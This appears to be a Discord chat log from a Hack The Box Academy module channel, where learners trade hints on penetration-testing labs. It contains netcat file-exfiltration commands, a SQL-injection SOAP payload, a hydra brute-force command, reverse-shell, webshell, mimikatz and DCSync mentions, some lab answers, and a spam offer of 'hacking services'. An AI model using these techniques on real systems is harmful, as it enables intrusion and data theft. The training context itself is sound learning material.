#modules

HMU for any hacking services

Hi, I'm having trouble on the Password Attack module, last question of Pass the Hash section, I'm trying to get a reverse shell through Invoke-WMIExec, it's showing that the command is executing on the DC01 target, but I'm not getting any connection to my netcat listener, any tips?
I've tried both the 10.x.x.x IP and the 172.x.x.x IP, and a couple different shell commands from reverseshells
nevermind, just tried again and it worked, don't know what I did different

how about you get lost

Anyone able to help with Server Side Attacks - Skills Assessment?

I have the ||G3tTh4tF1l34M3?|| and ||http://127.0.0.1:8080/message.txt||

nvm

probably not the place, but any ideas on how I could get a light mode to work on htb?

i asked about this. no light mode unfortunately.

ah yeah I figured, thanks for the confirmation though. wild that it's not an accessibility option

I have an extension that bolds the beginning of words for reading, but it's sorta painful to use on light text

they recommend if the browser has a contrast setting to change it, though not really the same.

Pivoting 😦

Anybody know what tool to use to talk to an ibm-db2 service?

I'm on the nmap hard lab.

honestly, this is better than the usual "how do I hack my ex's instagram"

what was the message?

"how do I steal discord tokens" or something

lmao what was that

free cash

Hi everyone, I don't know if you could help me, I'm stuck with Windows Privilege Escalation Skills Assessment - Part I. I'm not able to connect to the target. I don't know what username and password to use since it doesn't appear in the section. I have done an nmap and I see the RDP port 3389 open. I have also done the nmap with --script rdp-ntlm-info, rdp-enum-encryption and rdp-vuln-ms12-020, I get more information but no users to connect via RDP. Could you give me a clue, please? Thank you so much!

Thanks @acoustic owl , but how can I leverage the command injection flaw without connecting via RDP? As I review the entire module, the only way was the connection through SQL and the port is not open and I do not have a user. I know I left something out but I've been backing it up for several days and I can't find other way!

Look at || port 80 ||

Ok, thanks, I'll look for the 80, to see if I am able to find something

Command Injection modules might be useful too

Hello guys can somebody help me with Exploiting Web Vulnerabilities in Thick-Client Applications I'm going to kill myself

I can help you. I already killed myself in that section 😅

oh god thanks you

Hello, I'm currently at the module "PIVOTING, TUNNELING, AND PORT FORWARDING - RDP and SOCKS Tunneling with SocksOverRDP" and when I try to execute regsvr32.exe SocksOverRDP-Plugin.dll I get the following error. Please, how to solve this issue?

can anyone help me to solve vhost fuzzing module ? I am totally frustated to solve this.

You must first disable Windows Defender

The DLL is malicious and is detected and deleted by Defender

Which module, which section, which question, what have you already done? What does not work?

can i dm you?

sure

Thank you. It helped. It would be worth mentioning in the module steps.

hello

hello guys, can someone help me out on the AD Enum & Attack module on section kerberoasting from linux?

What does not work?

Got it. Thanks anyways 🙂

Not really a module question but was wondering if anyone uses removable storage with a VM? I want to save my notes for HTB on a portable SSD, but ive never mounted a device before. Im positive it IS connected to my VM but whenver i use fdisk -l i only get sda1, sda2, sda5.

Password Attacks >> Password Mutations - Am I really supposed to take the time and brute force SSH with a password list with a count of over 94K ?

try to narrow down the password list by simply using only words that start with the letter b/B

Thanks for the tip 🙂

hello, extremely new to HTB, coming from THM 2%, goals are OSCP or eCPPTv2 atm, been advised to do TJ Null's box's, how do i find them?

coming from a telecommunications background, so far i've acheived CCNA, eJPT, CEH and working on security+

Better ask here #general

https://docs.google.com/spreadsheets/u/1/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/htmlview

https://www.netsecfocus.com/oscp/2021/05/06/The_Journey_to_Try_Harder-_TJnull-s_Preparation_Guide_for_PEN-200_PWK_OSCP_2.0.html

Otherwise just ask the search engine of your confidence

thank you!

TJNull's list is my plan after I finish HTB modules... which I will get to if they** stop releasing more modules**.

student plan?

May I know where is the "Dump Memory to File" in x64dbg? I am following materials, but it is hard to follow. Course material doesn't mark up where to click...

Unable to understand why HTB stuff doesn't instruct more clearly

M:Attacking Common Applications(Attacking Thick Client Applications)

No.

Course material says "Let's export the newly discovered mapped item from memory to a dump file by right-clicking on the address and selecting Dump Memory to File."

but which address? where? Course material is so confusing....

Haha, they keep releasing more modules.
We are never finished

The next one...

I've read all of the CME module, and the Blind SQL injection module, and done most of labs in Blind SQL. So, hoping to have those two done by end of the week. And then do the reading for Deserialisation Attacks, and Abusing HTTP this weekend.

The HTTP modules are really hard....
I'm stuck in HTTP Attacks right now. I am somehow too stupid for it 🙈

Not looking promising for me then 😄

One of the problems with the higher tier modules, less people have done them. Google Fu is less useful 😦

The modules are also brand new. Of course, only a few people have done them

Not all of them surely?

No, I mean there are not many people who have taken these modules so far

and one more module

It seems to be not yet published

@pine dagger , we'll never get through all the modules

HTB makes modules faster than I can learn.
I mean, yesterday I finished the module HTTPs/TLS Attacks and today two new modules are coming out

oh yeah i want to know, if i finished a module under subscription, and they add more info to the module after the subscription, can i still access the module, or do i have to pay again to access it.

Since they claimed that if you finished a module during a subscription, it'd be as if you bought it.

So im just wondering if yall experienced this.

Every module that you complete during your subscription is yours.
If the module is later updated, it still belongs to you and you get the new content for free.

oh shit, nice

still doing the free ones but eventually i'll get student plan

Feel free to DM if you're still stuck 🙂

Module:KERBEROS ATTACKS
Section:Unconstrained Delegation - Users
Hi, I need help in this section. I have followed all the steps as mentioned in the section, but the DCSync attack was not successful. Can I contact someone to show them the steps I have taken in detail? Thank you in advance.

Thank you, I have sent you a message.

hi, im stuck on the module File Inclusion section skills assessment, i find the page ifl_***** . Or I manage to list /access.log but when I send my webshell all of a sudden the logs don't refresh so no result afterwards, a hint would be a great help! TY

Take a close look at the log file.
It contains double quotes.
Your payload must therefore not contain double quotes

I hadn't thought of that! I test, thank you

this worked! thanks

Hi, can anyone help me on "SQLmap - Bypassing Web Application Protections" module? for case 9 and 11..

Need some hints on Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
for assessment 2 on AD enum and attack, i found the password dumping the lsa, but i cant seem to get the username for that password
I have System Shell on SQL01 and can execute mimikatz

Hi all
Module : Active Directory Enum & Attacks
Section : Skill Assessment 2
I am blocked on the question 4 " Use a common method to obtain weak credentials for another user.
Submit the username for the user whose credentials you obtain."
I guess the password (Wxxxxxxx) and confirme it with the next question, but impossible to find the user.
I tried all the technique explain in password spraying from linux but nothing work (cme or custom script).
I used the worldlist provide in the linux attack host /opt/jsmith.txt and several other lists present
on the host..
I am blocked on this modules since several days. if some one can help me it will be very appreciated.
Have a good day all 🙂

Did u use DomainPasswordSpray

nop i dont think; what do you mean ? it s a tool ?

i used classical crackmapexec cmd most

U can xfreerdp into ms01

with AB####

And then use DomainPasswordSpray

Internal Password Spraying - from Windows:

tks i will try it immediatly

thanks for the tips

Did it work

Hello, Noob question here. I am at module "Information Gathering - Web Edition" at the Vhosts section. I use my own Parrot linux VM locally. I start the target system, after that I download the ovpn file and start my vpn connection using that file. I assumed the target system is a name server as I can use dig pointing to this target IP. However I do not seem to find how to get to the vhost machine. In one attempt I even tried the target system to execute "curl -s http://<target IP> -H "Host: www.inlanefreight.htb", to no avail. What am I missing here.

you need to add the entry to etc hosts

gottem

I was first

@odd notch you thought

Hi where is the word list suggestd in the smpt section in the footprinting module.

Hey I need some help on the Meterpreter module in Academy. I am supposed to exploit the msf module iis_webdav_upload_asp on port 80 however the Microsoft IIS httpd 10.0 service is running on port 5000 and can't be accessed with the exploit. I don't see a way of fixing it

Do you have the IP address and corresponding host name entry in /etc/hosts?

Yesss !! thks a lot 🙂

maybe try set RPORT 5000

Already did

rip

Isn't really something on my end idk how to get past it

Also can't reach support on Academy the messaging doesn't work

You could try looking up exploits for it online and use those

or in searchsploit

Is it a certain CVE you’re exploiting?

Footprinting contains a username/password wordlist iirc

respect for yall helping in this channel literally 24/7

♥️

Ye there is a resource button. I missed it. but how do i use it tho

the list that is

not the button

In the Academy module you are literally supposed to copy what they are doing it isn't supposed to vary. They give you the exploit and it is the same service

Sometimes the write ups don’t work

Right click the download button, copy link address. In your VM do wget <paste link>

I would probably suggest starting over and doing it again and if it still doesn’t work then maybe try searching for a different exploit

I assumed using the IP directly would have been enough. What would you add to the /etc/hosts file to fix this? <IP address > target?

Academy modules can vary from the examples given. They aren't always 1:1

no I mean how do I use the list to enumrate... I don't see any suggested utilities. I dunno if I should find one myself or is there some recommended one

Read the section carefully

There is an enum it talks about

In the Kerberos Attacks module Skills Assessment, is there a way to get DA and/or a shell on the DC? I got the flag but not a shell/login.

This one seems to be it isn't my first module

So if you do cat /etc/hosts you’ll see that there’s an IP address and a corresponding host name. So you’ll want to add the box’s IP address and the host name in the same format

What module & section?

39 and 414

Names

https://academy.hackthebox.com/module/39/section/414

Numbers don't mean shit to me

It is literally called Meterpreter lmao

It usually is, but the web server is using a virtual hosts file. So it redirects incoming requests to the domain which is why it appears to not work (and also why you need to the entry in etc hosts)

It says not to relay on it... but it suggest we use a list in the question. I'm confused. there is no mention of a tool

I have the list

Not relying on it doesn't mean to not use it. It just means it can give false positives, so manually checking it's results helps confirm things

ok... still no tool tho 😦

I mean I found a username || root || but is not the answer obv

Smtp-user-enum

where did you see it in the section? just as a sanity check for me

Ctrl+f "smtp-" in your browser lol

Or "enum"

don't see it in the section sorry

Give me a sec to check notes. I don't recall if I was told about the tool or it was mentioned

oh...

So I'm not insane

cool

witch,

someone who completed password attacks

am just missing the linux hunt section but im not able do find it

So getting the "apache2 ubuntu default page" is what I should get? That is with setting both the inlanefreight.htb and the www.inlanefreight.htb in the hosts file.

It's in the section "Attacking Email Services"

huh

it's not the the footprinting module

Attacking common services

Yeah

You’ll get whatever documents the web server is serving, so in this case it appears to be serving the default Apache pages yes

So it's not mentioned in footprinting

There are multiple commands that you can use to find stuff from that section specifically

and a few tools mentioned as well on how to get the credentials

that's a bit ahead of the module

intersting

Is there another way that people are meant to enum SMTP in footprinting @autumn pilot or is it the list is small and manual is fine

if I can recall correctly, you can use the metasploit module with the default list to do that

Oh yeah there is a msf module

I completely forgot

nope not there yet

Oi, you still need help with this? I found your issue

yes

hey guys im doing pass the ticket linux and when i use keytabextract.py on svc_workstations.kt i dont get ntlm hash which i am supposed to crack, is it supposed to be like this?

Have you navigated to the website on port 5000?

We're referring to using msfconsole to use an exploit not the academy module

Yes nothing shows up

Is it 5000, or 50,000

5000

It's 5000

You don't get a login page?

On shitty mobile so the screenshot doesn't load for me of their enumeration

I tried manually going on the web to port 5000 to the address and it says it is too long to load or something

no

Try resetting your VPN connection then

That wouldn't matter

Done that multiple times

Machine resets

That's the issue. You're attacking the right port but you need to see that service. Following along in this example isn't exactly right. You're on the right track but you need to know that service in order to be successful. Might want to hit it from the attack box that the platform provides

Yah I'll go try that

Many times pwnbox is the only thing that works

Yeah, but if you have the time later play around with it through your own VM again. It's good practice to troubleshoot.

Oh brother I do that all too often XD

Thanks for the help

Odd... How would you go about making a bash script for that?

Test test

No problem. Good luck and hopefully you get a smooth run after this.

Huh discord hang for a sec

Soooooo found a different exploit and don't think you were supposed to go the way I just found cause I found NT Authority lmao

YUP! lol Good on ya buddy.

Yup lmao

Thx

No problem. Stuff can be frustrating, but just keep trucking and don't be afraid to boot up the attack machine to see if you get different results. Don't forget we are technically "researchers" so explore as much as you can when it comes to labs and modules. The more you practice the better you'll be in a practical situation.

Thanks for the pep talk XD It is always good to just take a break then come back to it

Hard to do a bash script for it just BC SMTP is a slowwww service

I see

Well today is over but I'm kinda sad i didn't complete at least a section today

OK, found it. The default apache page threw me off a bit. And using a 150K+ wordlist for fuzzing the domain name yielded so many result that I did not notice the hosts that returned a different result from that default page. Thx for the help.

Np

In msfconsole just do "search SMTP enum"

hey might be a dumb question, but how do i get file content through smbclient?

Automatic verification failed. Please contact support.

what

Automatic verification failed. Please contact support.

Bot got borked

Automatic verification failed. Please contact support.

like rn i am using this command and got this:

Automatic verification failed. Please contact support.

Automatic verification failed. Please contact support.

what cmd can i use to retreive the julo.txt?

Automatic verification failed. Please contact support.

Well if you're impersonating him, you can just connect to his share and use "get"

Automatic verification failed. Please contact support.

Also don't mind the bot he's a little durnk

Automatic verification failed. Please contact support.

Ditch the -c option because it's connecting, running the command you're specifying and then dropping the connection after output.

Automatic verification failed. Please contact support.

Who crashed the bot? 🤪

Automatic verification failed. Please contact support.

hahaahh 😂

Automatic verification failed. Please contact support.

With every message it seems to do react with the bot

Automatic verification failed. Please contact support.

yup!! tnx

Automatic verification failed. Please contact support.

Or using -c "get julio.txt"

Automatic verification failed. Please contact support.

please someone who can help me in password attacks module - sectio: linux hunting

whatsup

Fooprinting Skill Assessment - Medium

Enumerate the server carefully and find the username "HTB" and its password. Then, submit this user's password as the answer.

I've found the credentials for the "other" account, i'm unable to login in SQL Management Server

Perhaps try logging into the windows account that can be associated with the found username

You can also try using the CMD line instead

Worked, Thankyou

how can i transfer my keytab from ssh to my local?

i tried opening python http server on ssh

and wget from my machine

but its not working for sm reason

In some cases making an HTTP connection is not allowed on systems from the outside to in. You'll need to find a way to upload to your machine because calls out to your own machine should be more lenient. In some cases an upload might not be necessary. Definitely go back to the file transfer module and look over it. This is a must if you plan to get into pentesting, because you need to be able to adapt for exfil. If you don't want to go review the module this link might be of some use https://book.hacktricks.xyz/generic-methodologies-and-resources/exfiltration.

Automatic verification failed. Please contact support.

i still cant seem to get it...

i tried using python uploadserver but its also not working

perhaps smb

or other methods

What are you trying to do?

Download a file from the target machine to your local host?

yuh

You can use netcat

that's probably the most convoluted way

Not at all

from target machine though you can run the python http server and use wget on your local machine to grab it

Or you could use netcat 😛

i did alr

its not working

so in your ssh session on the target machine you ran the python http server

not on your pwnbox/vm

yup

it cant connect

🤷‍♂️

interesting

i never had issues with it

what module is this related to?

Would you like to try the method I suggested

password attacks linux pass the ticket

with netcat?

follow the instructions

Yes

in that section

iirc there was no need to download anything

or I just copy/pasted

either way

OH

OHHHH

yeah

no

you don't need to download that file AT ALL

huh

the export command

sets an environment variable

yeah but it says down in the note

i need to transsfer

hold on

let me double check my notes

im trying netcat rn

Do you want me to guide you through it 😛

ok

now I remember

I was able to upload from the connected host

i used the syntax: curl -T <filename> <myserver>

-T is for post request

its not working idk hwy

You’re probably not doing it correctly

Would you like me to guide you through how to do it

sure

and how did you start the upload server?

holy tits im on this file transfer problem for like 2hr

💀

i'd suggest going over the file transfer part again

im going all over my notes

but nothing is working

i ususally just make python http server

and its always chill

On your local host: nc -l <port> > <file name>

python -m uploadserver (port)

oh yeah

i tried that

it was not working

it crashed everytime

idk why

it would ping my server on local machine

but never send the file

@glacial hazel

this good?

Umm

Why does it look like that lol

its two terminals

What command did you type on your local host

oh

I see the issue

they used the -l flag

on their local host

doesn't -l indicate that you are listening on that port

yes

and then the > redirects received bytes to the file

yes

but they are already listening on the target machine

which is the problem :)

they aren't actually connecting

they are just setting up listeners xD

i tried connecting

@naive field what command did you type on your local host

which ip should i use the machines 10.129.x... or the 172.1.6.15

the top one

i tried connecting here

u see

but not working

On the host with the file: nc -w 2 <your ip> <port> < <file to transfer>

$ nc -l 1234 > filename.out

Using a second machine, connect to the listening nc process, feeding it the file which is to be transferred:

$ nc host.example.com 1234 < filename.in

let me try

my brain is fied

friedd

the first command is on local machine

or the attack?

omg

I told you how to do it lol

reading comprehension will tell you

i did it

its not working

it says connectino refused

Send the command you’re using

let me try again with diff ip

since the second paragraph starts with "using a second machine"

im sry im just in my class and trynna do this so its like doing 50 things at once

also comprehending "filename.out"

focus on your class first then come back to this later

i dont have

wifi at home

:D

since im and exch student in usa

then that sucks to suck then brother. If you have a phone you can see if your provider offers tethering services

i got no bag for internet rn

i got hotspot

but its 20gb /month

so it goes out pretty fast xd

you really shouldn't be using that much if you're JUST doing academy content on the hotspot

yeah but i use pwn box

but YouTube and streaming platforms

so the pwnbox uses additional wifi

not really how that works cheif

yeah prob

but it still eats my internet ngl haha

and sometimes i wanna wathc something on laptop so yeah...

like yes it does use additional data; but not enough to be shooting it through

i watch one episode on netflix

its alr almost 2gb gone

yeah

and i play music on yt while im doing htb

Video streaming is going to be the roughest

yeah its fucked

but i gotta hustle through this

i got 3 more weeks in usa

cant let this stop me from grinding

you can't do this when you are back home?

i can

but i do not want to waste time

im planing on doing cpts bu the end of june

i didnt see this yesterday but ty nonetheless

then not much we can do to help

you can see if your school is willing to let you stay longer

because of your home situation not having internet

i do stay longer

i finish in like 10min

ill come back

i do my shit in library when i finish school

but also when you put a time constraint on yourself you only end up stressing yourself out more ¯_(ツ)_/¯

thats true

like it's good to have a goal time

but you said end of june? that's still a month and a half away

that's PLENTY of time

yeah but i am not sure if i can get ready for cpts by that time

and that's ok

¯_(ツ)_/¯

it doesn't reflect negatively on you that you aren't ready by your own arbitrary deadline

but i feel the part after ad will gro pretty fast

since i do bbh

as long as you are learning

that's the important thing

but my AD knowledge etc.. not good.

yeah

i m justr trynna get a job as soon as possible

thats why im trynna stay on grind as much as i can

cpts and cbbh aren't guaranteed to get you a job

oh ofc

i know

hell most certs don't guarantee a job

but it will def help me

with knowledge and resume

if you're actually looking for a job, you're better off getting OSCP

yeah i did want to

as that's industry recognized

but hell i got no money even close to 2500$ lol

CPTS isn't as industry recognized yet

i was gonna ask if the oscp was one pof the certs that get a job cuz thats what im going for

oscp is $1500

OSCP opens the door; CPTS actually helps you nail the interview

yeah mb

whats in the cpts that isnt covered by the OSCP if u know?

still too much for me haha

lmao fair

it mostly is all covered

it's mostly all the same from the OSCP syllabus

but we are starting to stray from topic here

except u cant use any automation tools in oscp

(the ones u didnt write )

like linpeas etc...

u can use linpeas 90 percent sure lol

lemme doublecheck

i know one guy got f-ed

bcs he used linpeas

so im not sure how it is now

really crazy i feel like i researched it

yeh it was pretty famous

"scandal" hahahaah

since that guy was a big head in cybersec

ah they have one auto exploit in linpeas thats y

https://www.reddit.com/r/oscp/comments/mw4idk/heads_up_dont_use_linpeas_on_the_exam/

u can use auto enum on oscp fine tho i think

No he still passed

straying off-topic from modules please move conversation to DMS or @halcyon pond can verify their app.hackthebox.com account following #welcome and move chatter to #careers-and-certs

oh they let him okay

ik first he didnt pass

oh yeah mb

ok im back

imma do this now 🙏

Whats the toughest module

its not working

😭

*don't use host.example.com use your ip:port

idk then man

workss

Here's something I like to do. Sometimes the more simple the better. Cat out the file and pipe that into base64 encoding. Then copy paste into a file. Afterwards base64 decode and redirect into a new file. MD5sum for sanity check

it had a delay like 20sec

but thanks yall <3

I've heard the common one being tough is AD

yeah i wanted to do that but i wanted to do this first

yes netcat isn't instantaneous especially if it's data transfer; you're just not going to see the progress bar

since i was like shit i gotta see where its the poblem

https://academy.hackthebox.com/achievement/531355/25 @acoustic owl Thanks for the nudge ; )

Also think about it in terms of detection. The less you do and the less connections you make into the network the less noise you make. I definitely encourage you to explore, but sometimes getting fancy isn't worth it. Real adversaries want quick in and out as cleanly as possible.

the transfer with netcat worked?

hi

lol

yup

but now i got hella other problems lmaoo

this password attack module really drained tf out of me

interesting 😛

I have been struggling for a while to get any information off the ftp server for the footprinting easy lab and need a nudge. I am stuck witht the "229 Entering Extended Passive Mode (|||3945|)
150 Opening ASCII mode data connection for file list
226 Transfer complete" message and I am not sure how to move ahead

okay i restarted the machine

retired everything and its not working

i get this when i try to run proxychains

i started chisel server and connected to it through rdp

just as it said in the module

i feel like an a-hole asking this much in this channel

...

dm me

looks like your tunnel is broken. feel free to dm me if you need another pair of eyes for debugging

congrats - I'm curious about the very last question of the module: #modules message

(I maybe should have quoted that question a different way... hope it makes sense)

I was only able to access the drive. i did not get a shell

lolol

Just FYI; for the unix name (uname) portion of the Introduction To Academy/Interactive Section with Terminal, there is no longer a 'parrot' anywhere in the string:

Linux htb-b60zrcs6kk 6.1.0-0.deb11.5-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.12-1~bpo11+1 (2023-03-05) x86_64 GNU/Linux

Well it became clear, that only rubeus was on there 🙂

This is better to post in #858470491676737536

Thanks @fathom pendant

I do think, we can upload netcat. We have to mount it to the parrot OS -> RDP session

hey guys am stuck at Firewall and IDS/IPS Evasion - Hard Lab

i tried to run different scans

umm is there any tip

getting port 22 and 80, services are visible.

there are more ports for you to find. try to find another nice trick to circumvent the firewall

okay

thanks

there are several scans which I think I should run but they may consume soo much time 😦

am not sure if I am in the right track

dm me then

ok im out of ideas w/ Hacking Wordpress, Directory Indexing - i used wget to mirror the entire tree of the listable directory and didnt find a flag in there

or is there another listable directory not in that hierarchy

ugh nevermind, its not given in the structure section, but its mentioned in subsequent sections

hello everyone

am new to the server

How's everyone

this is not for introductions, its for module discussiononly read #rules and #welcome

oh sorry am just new

doesnt matter

read #rules and #welcome

https://academy.hackthebox.com/module/35/section/247 Is this what this is supposed to look like? I can't find a search in the exercise anywhere

Anyone working on windows attack and defense module?

https://dontasktoask.com

Well

Thanks for putting in efforts

np

Well how do I connect to DC1 using the given creds

which section

and which question

Any of its sections,
I just began with DCSync

Bounced back to 2nd section to see details of any guide on connection to DC1

so by connect are you asking about getting shell?

after already having domain creds?

Like RDP, because I have to see event logs

It's in a different network, can't access it directly

if its one you're meant to see event logs it should have specific instructions for you

otherwise you could pivot and run rdp via proxychains

but I dont think theres any segment that actually requires doing that

Yeah
And there's no clear instructions on how to actually connect to DC1

if its just shell run through the usual psexec/smbexec/winrm/wmiexec, ect

In every single assessment in each section carrying cubes, it states connecting to DC1

press Win+R ,type mstsc

Nope

what specifically are you trying to do in which section

I tried switching to user accounts as well, but to my surprise there wasn't an option even lmao

?

youre probably on a section where you're not expected to rdp

https://academy.hackthebox.com/module/176/section/1784

i have done this module press Win+R ,type mstsc and use the creds for DC1

ah here I was thinking you meant this was the AD attacks and enumeration module

Thanks bud
I had tried it once and I'll retry it again, maybe I mistyped it

idk for that specific one

No no

Hey Everyone! I am currently working on the File Upload Attacks - Skills Assessment section:

Stuck and need a nudge. I fuzzed the directories and found all the interesting PHP files. I read through the material and tried to use a method in the other section to read the contents of PHP files (I got it to work in the exercises by viewing the source of the page). So trying the same technique, it looks like my file is uploading (with a bypass technique), but I am not getting a B64 dump of any of the PHP files I try to read (I tried them all just as a sanity check). Please drop me a nudge in the right direction so that I can read the PHP file I discovered. Thanks, everyone.

Are there any other ports open

Usually mysql isn’t exposed externally

So you may need to abuse another attack vector to get access to the machine to get access to mysql

the only port I know for Mysql is 3306, i didn't think there were other ports because thats what the module told me.

Hello, has someone solved BROKEN AUTHENTICATION - Brute Forcing Cookies (Log in to the target application and tamper the rememberme token to give yourself super user privileges. After escalating privileges, submit the flag as your answer.)? I am stuck in decoding cookie, i have recognized the ||URL encoding and base64||, if i convert the result ||to HEX i can see the magic bytes 78 9C but i can't unzip using gunzip||.

Hint: ||It's not hex||

When using socks in metaspoilt after setting preferences then i run it, it starts then automatically stops straight away. any ideas? also cant see anything remaining in jobs.

In the footprinting medium lab, am I supposed to be able to login with the account found from the file you can mount?

Hey so, I can't shut down this seasonal box? Are we not able to until the time expires? I've just been doing this box for 10 hours straight, and need a break.

login to smb

because the service I need to get onto keeps crashing

Nvm, 😆

Yeah. You gotta figure out which service you'd log in with. Poke and Prod around.

The answer of what service is kinda in your nmap scan. use acronyms.

I'm in Using Web Proxies and the Proxying Tools section. Every IP address I try just gives a message at the end saying "Connection: close" and that's not the answer to the question in this section. Anyone else run into this?

thanks, I will try

You can use that login on certain services

im still

getting this

:/

Is your proxychains.conf correct

i added the thing they mentioned in the module

i just edited that and added this socks5 at the end

someone who completed password attacks

am trying to type the files wit h mimikatz but im not being able

what section?

passthehash

dm me

cool the new insignia for the seasonal machines

If you're using the socks5 one comment out the socks4

ohhh

I think I had a similar issue like that

Idk why it's an issue

yeah that wsa the issu

issue thanks a lot

oh shit nope

i thouht it connected 🤣

now im getting linux socket error or timeout

before there was none of that

I think you need more for the wmiexec issue because I believe it's expecting an IP not a cname

Linux01 is a domain (usually -d )

But idk wmiexec enough

It said in module this

"To use the Kerberos ticket, we need to specify our target machine name (not the IP address) and use the option -k."

:{

Does it give that as example?

Interesting

definetly 😂 since ive beenon this for like 2hr

hahaha

stuck on this part

good luck ¯_(ツ)_/¯

and i cant get the last question xd

ay

thanks a lot for helping

for real

i see u all the time here in chat i rly appreciate it

I'm not home to sanity check lol

And thanks I try lol

do u get payed for this?

i recon no but ahha

Lol no

yeah thats what i thought lol

was just interested since ur really helping here all the time :D

Anyone have advice on this Active Infrastruction Identification question

Has anyone gotten past the Proxying Tools section in Using Web Proxies? I've gone through the steps to set everything up right and I even get a line in HTTP history that says robots.txt. However, the only response I ever get at the end of the request, no matter what web site I use, is Connection: close. Does anyone know how to get the answer for this section? The hint says it starts with 'msf'.

I'm stuck on shells and payloads - bind shells. SSH is not working I been trying for 30 mins. And if it does work it doesn't let me type. I feel like I can beat it in 2 mins if ssh would work

Are you on the second question?

Have you tried using the script under No. 1: Server - Binding a Bash shell to the TCP session?

not the channel for this at all. module discussion only. Read #rules and #welcome

Yes the second

Try following the steps under Establishing a Basic Bind Shell with Netcat.

Yes I want to use that manual bash shell but I can't SSH into the target

It's not letting me

Or rather it's taking a very long time

That command is how you ssh to the target. And don't forget your listener. Also, ls -la is your friend.

Now I'm confused the command is how you SSH into the target?

Oh, wait. Never mind. You do have to ssh to the target first. Try restarting the session.

Yeah I did 5 times now Im waiting for response from support rn

I'm going to see if I can jump in and run it.

I had no problem getting in. Are you sure you're doing $ ssh htb-student@Ip-Address and then putting in the password?

Yes

Are you trying from your VM or the pwnbox?

Tried vm first then switched to pwnbox

Anyone avail for a nudge on the skills assessment for HTTP ATTACKS? I believe I (a) understand the hint [based on doing some testing], (b) believe I've got all the value-lengths fixed... BUT... still getting the WAF error, which suggests even though it should be bypassing the WAF, that it's not... but in my enumeration, I don't see any other means possible to do it... totally lost/frustrated at this point.

EDIT: Realized error of my ways wrt the WAF, email request SEEMS to go thru (based on return values), but NO email... 😭

EDIT2: SOLVED!!! Solution was something I swear I had (unsuccessfully) tried before, but suspect did it slightly wrong before + exhaustion -- with a clear head, quickly knocked it out.

I'm not sure what the issue would be. I was able to ssh in on both.

@red current thanks! Had to restart my PC not sure what was going on.

After restart got the flag

So I'm looking at the first part of the pivoting module with Dynamic Port forwaridng with ssh and socks tunneling -- Which command do I need to actually do in the lab? I'm doing ssh -D 9050 ubuntu@10.129.202.64 but when I nmap with proxychains nmap -v -sn 172.16.5.1-200 to nmap the internal network I get a no route to host?

Nice!

Have you set the tail and modified your proxychains.conf file?

Oh it's because the no route to host was for the other ports on other services. I see, I was able to scan it with a dynamic port forward

is anyone available to help me with password attack pass the ticket linux? im on the last question stuck all day

thanks!

Would like to see if the username and password are clickable. I mean, just click and copy, just as IP address do.

If I wish to start a capture without hostname resolution, verbose output, showing contents in ASCII and hex, and grab the first 100 packets; what are the switches used? please answer in the order the switches are asked for in the question.

help me

I know the answer but it shows up as incorrect lol

the command would be sudo tcpdump -nvXc 100 in order as indicated in the question but I can't find the answer if it is correct.

or sudo tcpdump -nvvXc 100

In the order indicated but does not appear as valid

only the paramaters

** what are the switches used? please answer in the order the switches are asked for in the question.
**

Hello somebody can help me with WEB SERVICE & API ATTACKS module

@autumn pilotThe order according to the question is sudo tcpdump -nvXc100
-n Do not convert addresses (i.e. host addresses, port numbers, etc.) to names.

-v: When parsing and printing, produce (slightly more) detailed results. For example, the time-to-live, ID, total length and options in an IP packet are printed. It also enables additional packet integrity checks, such as IP and ICMP header checksum verification.
When writing to a file with the -w option and at the same time not reading from a file with the -r option, report to stderr, once per second, the number of packets captured. On Solaris, FreeBSD, and possibly other operating systems, this periodic update may actually cause the loss of captured packets on their way from the kernel to tcpdump.

-X:
When parsing and printing, in addition to printing the headers of each packet, print each packet's data (minus its link-level header) in hexadecimal and ASCII. This is very useful for parsing new protocols. In the current implementation, this flag can have the same effect as -XX if the packet is truncated.

-c:
Exit after receiving count packets.

im in skills assesment and i dont know how to solve it

you are asked for the switches (parameters) not the whole command

the switches are --> -nvXc 100

-nvXc 100 thanks @autumn pilot crack

can somebody help me with Web Service & API Attacks - Skills Assessment module please?

What exactly is not working?

when i put the sqli payload with some characters doesnt work

File "/home/ivan/Desktop/pocsoap2.py", line 3
payload = '<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:tns="http://tempuri.org/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/">soap:Body<LoginRequest xmlns="http://tempuri.org/"><username>admin</username><password> 'or 1 = 1' </password></LoginRequest></soap:Body></soap:Envelope>'
^
SyntaxError: cannot assign to operator

Remember that not all characters can be used in XML
https://stackoverflow.com/questions/1091945/what-characters-do-i-need-to-escape-in-xml-documents

I could use some help, I am stuck on skill assessment brute forcing, does any one know what .txt file we are suppose to use for the password. I have tried multiple files (from locate password) and they either do not work or I get a list of passwords, and not work with the user name.

how tf do i get more cubes without paying

win giveaways or ctfs

ok

Whats the objective of the hackthebox machine thing

how do we do it

Get a flag

You need to create your own list
||cupp|| is your friend

I do not believe so for the first skill assessment that is login into the browser.

This question?
As you now have the name of an employee, try to gather basic information about them, and **generate a custom password wordlist **that meets the password policy. Also use 'usernameGenerator' to generate potential usernames for the employee. Finally, try to brute force the SSH server shown above to get the flag.

Hi, i'm struggling on the Active Directory Enum and Attack. The question is What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word).

i can't figure out where to look

No that is not the question. this is the question: Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?

okay, then ||rockyou|| will help you

I wish...I have done rock you multiple time with even different Rock you versions. sometime I get passwords sometimes I dont, usually I get password file not found

example I have used this: hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt "http-post-form://157.245.41.35:31182/admin_login.php:user=^USER^&pass=^PASS^:F<form name='login'"
and I get:

[ERROR] File for passwords not found: /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt

Check the path of your file

I have done locate Rockyou.txt and those file paths do not work. I am assuming the issue is the path for Rockyou.txt that I am having issue with but I cannot seem to fix it

Yes, you must specify the correct path to the file.

Are you using the PwnBox or your own VM?

I never know how to answer this, I think it is PwnBox. It is whatever I spawn then hit Parrot terminal

This is the PwnBox

yep that is what I use

